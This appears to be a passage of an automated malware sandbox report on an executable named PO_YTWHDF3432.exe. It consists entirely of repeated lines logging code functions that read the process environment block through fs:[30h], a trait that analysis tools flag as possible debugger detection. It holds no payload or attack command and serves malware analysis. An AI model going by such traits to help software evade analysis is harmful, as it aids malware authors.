            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E53E mov eax, dword ptr fs:[00000030h]3_2_0190E53E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E53E mov eax, dword ptr fs:[00000030h]3_2_0190E53E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E53E mov eax, dword ptr fs:[00000030h]3_2_0190E53E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0535 mov eax, dword ptr fs:[00000030h]3_2_018F0535
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0535 mov eax, dword ptr fs:[00000030h]3_2_018F0535
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0535 mov eax, dword ptr fs:[00000030h]3_2_018F0535
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0535 mov eax, dword ptr fs:[00000030h]3_2_018F0535
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0535 mov eax, dword ptr fs:[00000030h]3_2_018F0535
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0535 mov eax, dword ptr fs:[00000030h]3_2_018F0535
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8550 mov eax, dword ptr fs:[00000030h]3_2_018E8550
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8550 mov eax, dword ptr fs:[00000030h]3_2_018E8550
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191656A mov eax, dword ptr fs:[00000030h]3_2_0191656A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191656A mov eax, dword ptr fs:[00000030h]3_2_0191656A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191656A mov eax, dword ptr fs:[00000030h]3_2_0191656A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0199A49A mov eax, dword ptr fs:[00000030h]3_2_0199A49A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019144B0 mov ecx, dword ptr fs:[00000030h]3_2_019144B0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E64AB mov eax, dword ptr fs:[00000030h]3_2_018E64AB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196A4B0 mov eax, dword ptr fs:[00000030h]3_2_0196A4B0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E04E5 mov ecx, dword ptr fs:[00000030h]3_2_018E04E5
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01918402 mov eax, dword ptr fs:[00000030h]3_2_01918402
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01918402 mov eax, dword ptr fs:[00000030h]3_2_01918402
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01918402 mov eax, dword ptr fs:[00000030h]3_2_01918402
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A430 mov eax, dword ptr fs:[00000030h]3_2_0191A430
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DC427 mov eax, dword ptr fs:[00000030h]3_2_018DC427
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DE420 mov eax, dword ptr fs:[00000030h]3_2_018DE420
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DE420 mov eax, dword ptr fs:[00000030h]3_2_018DE420
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DE420 mov eax, dword ptr fs:[00000030h]3_2_018DE420
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01966420 mov eax, dword ptr fs:[00000030h]3_2_01966420
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01966420 mov eax, dword ptr fs:[00000030h]3_2_01966420
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01966420 mov eax, dword ptr fs:[00000030h]3_2_01966420
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01966420 mov eax, dword ptr fs:[00000030h]3_2_01966420
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01966420 mov eax, dword ptr fs:[00000030h]3_2_01966420
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01966420 mov eax, dword ptr fs:[00000030h]3_2_01966420
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01966420 mov eax, dword ptr fs:[00000030h]3_2_01966420
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190245A mov eax, dword ptr fs:[00000030h]3_2_0190245A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0199A456 mov eax, dword ptr fs:[00000030h]3_2_0199A456
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018D645D mov eax, dword ptr fs:[00000030h]3_2_018D645D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190A470 mov eax, dword ptr fs:[00000030h]3_2_0190A470
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190A470 mov eax, dword ptr fs:[00000030h]3_2_0190A470
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190A470 mov eax, dword ptr fs:[00000030h]3_2_0190A470
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196C460 mov ecx, dword ptr fs:[00000030h]3_2_0196C460
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198678E mov eax, dword ptr fs:[00000030h]3_2_0198678E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E07AF mov eax, dword ptr fs:[00000030h]3_2_018E07AF
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019947A0 mov eax, dword ptr fs:[00000030h]3_2_019947A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EC7C0 mov eax, dword ptr fs:[00000030h]3_2_018EC7C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019607C3 mov eax, dword ptr fs:[00000030h]3_2_019607C3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E47FB mov eax, dword ptr fs:[00000030h]3_2_018E47FB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E47FB mov eax, dword ptr fs:[00000030h]3_2_018E47FB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196E7E1 mov eax, dword ptr fs:[00000030h]3_2_0196E7E1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019027ED mov eax, dword ptr fs:[00000030h]3_2_019027ED
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019027ED mov eax, dword ptr fs:[00000030h]3_2_019027ED
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019027ED mov eax, dword ptr fs:[00000030h]3_2_019027ED
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01910710 mov eax, dword ptr fs:[00000030h]3_2_01910710
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C700 mov eax, dword ptr fs:[00000030h]3_2_0191C700
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0710 mov eax, dword ptr fs:[00000030h]3_2_018E0710
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195C730 mov eax, dword ptr fs:[00000030h]3_2_0195C730
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191273C mov eax, dword ptr fs:[00000030h]3_2_0191273C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191273C mov ecx, dword ptr fs:[00000030h]3_2_0191273C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191273C mov eax, dword ptr fs:[00000030h]3_2_0191273C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C720 mov eax, dword ptr fs:[00000030h]3_2_0191C720
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C720 mov eax, dword ptr fs:[00000030h]3_2_0191C720
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922750 mov eax, dword ptr fs:[00000030h]3_2_01922750
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922750 mov eax, dword ptr fs:[00000030h]3_2_01922750
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01964755 mov eax, dword ptr fs:[00000030h]3_2_01964755
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196E75D mov eax, dword ptr fs:[00000030h]3_2_0196E75D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191674D mov esi, dword ptr fs:[00000030h]3_2_0191674D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191674D mov eax, dword ptr fs:[00000030h]3_2_0191674D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191674D mov eax, dword ptr fs:[00000030h]3_2_0191674D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0750 mov eax, dword ptr fs:[00000030h]3_2_018E0750
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8770 mov eax, dword ptr fs:[00000030h]3_2_018E8770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E4690 mov eax, dword ptr fs:[00000030h]3_2_018E4690
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E4690 mov eax, dword ptr fs:[00000030h]3_2_018E4690
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019166B0 mov eax, dword ptr fs:[00000030h]3_2_019166B0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C6A6 mov eax, dword ptr fs:[00000030h]3_2_0191C6A6
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0191A6C7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A6C7 mov eax, dword ptr fs:[00000030h]3_2_0191A6C7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E6F2 mov eax, dword ptr fs:[00000030h]3_2_0195E6F2
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E6F2 mov eax, dword ptr fs:[00000030h]3_2_0195E6F2
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E6F2 mov eax, dword ptr fs:[00000030h]3_2_0195E6F2
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E6F2 mov eax, dword ptr fs:[00000030h]3_2_0195E6F2
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019606F1 mov eax, dword ptr fs:[00000030h]3_2_019606F1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019606F1 mov eax, dword ptr fs:[00000030h]3_2_019606F1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922619 mov eax, dword ptr fs:[00000030h]3_2_01922619
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E609 mov eax, dword ptr fs:[00000030h]3_2_0195E609
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E262C mov eax, dword ptr fs:[00000030h]3_2_018E262C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FE627 mov eax, dword ptr fs:[00000030h]3_2_018FE627
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01916620 mov eax, dword ptr fs:[00000030h]3_2_01916620
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01918620 mov eax, dword ptr fs:[00000030h]3_2_01918620
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FC640 mov eax, dword ptr fs:[00000030h]3_2_018FC640
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01912674 mov eax, dword ptr fs:[00000030h]3_2_01912674
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A660 mov eax, dword ptr fs:[00000030h]3_2_0191A660
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A660 mov eax, dword ptr fs:[00000030h]3_2_0191A660
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A866E mov eax, dword ptr fs:[00000030h]3_2_019A866E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A866E mov eax, dword ptr fs:[00000030h]3_2_019A866E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E09AD mov eax, dword ptr fs:[00000030h]3_2_018E09AD
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E09AD mov eax, dword ptr fs:[00000030h]3_2_018E09AD
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019689B3 mov esi, dword ptr fs:[00000030h]3_2_019689B3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019689B3 mov eax, dword ptr fs:[00000030h]3_2_019689B3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019689B3 mov eax, dword ptr fs:[00000030h]3_2_019689B3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019149D0 mov eax, dword ptr fs:[00000030h]3_2_019149D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AA9D3 mov eax, dword ptr fs:[00000030h]3_2_019AA9D3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019769C0 mov eax, dword ptr fs:[00000030h]3_2_019769C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA9D0 mov eax, dword ptr fs:[00000030h]3_2_018EA9D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA9D0 mov eax, dword ptr fs:[00000030h]3_2_018EA9D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA9D0 mov eax, dword ptr fs:[00000030h]3_2_018EA9D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA9D0 mov eax, dword ptr fs:[00000030h]3_2_018EA9D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA9D0 mov eax, dword ptr fs:[00000030h]3_2_018EA9D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA9D0 mov eax, dword ptr fs:[00000030h]3_2_018EA9D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019129F9 mov eax, dword ptr fs:[00000030h]3_2_019129F9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019129F9 mov eax, dword ptr fs:[00000030h]3_2_019129F9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196E9E0 mov eax, dword ptr fs:[00000030h]3_2_0196E9E0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196C912 mov eax, dword ptr fs:[00000030h]3_2_0196C912
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018D8918 mov eax, dword ptr fs:[00000030h]3_2_018D8918
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018D8918 mov eax, dword ptr fs:[00000030h]3_2_018D8918
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E908 mov eax, dword ptr fs:[00000030h]3_2_0195E908
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E908 mov eax, dword ptr fs:[00000030h]3_2_0195E908
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196892A mov eax, dword ptr fs:[00000030h]3_2_0196892A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0197892B mov eax, dword ptr fs:[00000030h]3_2_0197892B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01960946 mov eax, dword ptr fs:[00000030h]3_2_01960946
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01984978 mov eax, dword ptr fs:[00000030h]3_2_01984978
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01984978 mov eax, dword ptr fs:[00000030h]3_2_01984978
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196C97C mov eax, dword ptr fs:[00000030h]3_2_0196C97C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01906962 mov eax, dword ptr fs:[00000030h]3_2_01906962
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01906962 mov eax, dword ptr fs:[00000030h]3_2_01906962
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01906962 mov eax, dword ptr fs:[00000030h]3_2_01906962
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0192096E mov eax, dword ptr fs:[00000030h]3_2_0192096E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0192096E mov edx, dword ptr fs:[00000030h]3_2_0192096E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0192096E mov eax, dword ptr fs:[00000030h]3_2_0192096E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0887 mov eax, dword ptr fs:[00000030h]3_2_018E0887
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196C89D mov eax, dword ptr fs:[00000030h]3_2_0196C89D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E8C0 mov eax, dword ptr fs:[00000030h]3_2_0190E8C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C8F9 mov eax, dword ptr fs:[00000030h]3_2_0191C8F9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C8F9 mov eax, dword ptr fs:[00000030h]3_2_0191C8F9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AA8E4 mov eax, dword ptr fs:[00000030h]3_2_019AA8E4
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196C810 mov eax, dword ptr fs:[00000030h]3_2_0196C810
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A830 mov eax, dword ptr fs:[00000030h]3_2_0191A830
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198483A mov eax, dword ptr fs:[00000030h]3_2_0198483A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198483A mov eax, dword ptr fs:[00000030h]3_2_0198483A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01902835 mov eax, dword ptr fs:[00000030h]3_2_01902835
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01902835 mov eax, dword ptr fs:[00000030h]3_2_01902835
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01902835 mov eax, dword ptr fs:[00000030h]3_2_01902835
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01902835 mov ecx, dword ptr fs:[00000030h]3_2_01902835
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01902835 mov eax, dword ptr fs:[00000030h]3_2_01902835
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01902835 mov eax, dword ptr fs:[00000030h]3_2_01902835
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01910854 mov eax, dword ptr fs:[00000030h]3_2_01910854
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E4859 mov eax, dword ptr fs:[00000030h]3_2_018E4859
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E4859 mov eax, dword ptr fs:[00000030h]3_2_018E4859
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196E872 mov eax, dword ptr fs:[00000030h]3_2_0196E872
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196E872 mov eax, dword ptr fs:[00000030h]3_2_0196E872
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01976870 mov eax, dword ptr fs:[00000030h]3_2_01976870
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01976870 mov eax, dword ptr fs:[00000030h]3_2_01976870
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01994BB0 mov eax, dword ptr fs:[00000030h]3_2_01994BB0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01994BB0 mov eax, dword ptr fs:[00000030h]3_2_01994BB0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0BBE mov eax, dword ptr fs:[00000030h]3_2_018F0BBE
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0BBE mov eax, dword ptr fs:[00000030h]3_2_018F0BBE
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0BCD mov eax, dword ptr fs:[00000030h]3_2_018E0BCD
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0BCD mov eax, dword ptr fs:[00000030h]3_2_018E0BCD
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0BCD mov eax, dword ptr fs:[00000030h]3_2_018E0BCD
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198EBD0 mov eax, dword ptr fs:[00000030h]3_2_0198EBD0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01900BCB mov eax, dword ptr fs:[00000030h]3_2_01900BCB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01900BCB mov eax, dword ptr fs:[00000030h]3_2_01900BCB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01900BCB mov eax, dword ptr fs:[00000030h]3_2_01900BCB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196CBF0 mov eax, dword ptr fs:[00000030h]3_2_0196CBF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190EBFC mov eax, dword ptr fs:[00000030h]3_2_0190EBFC
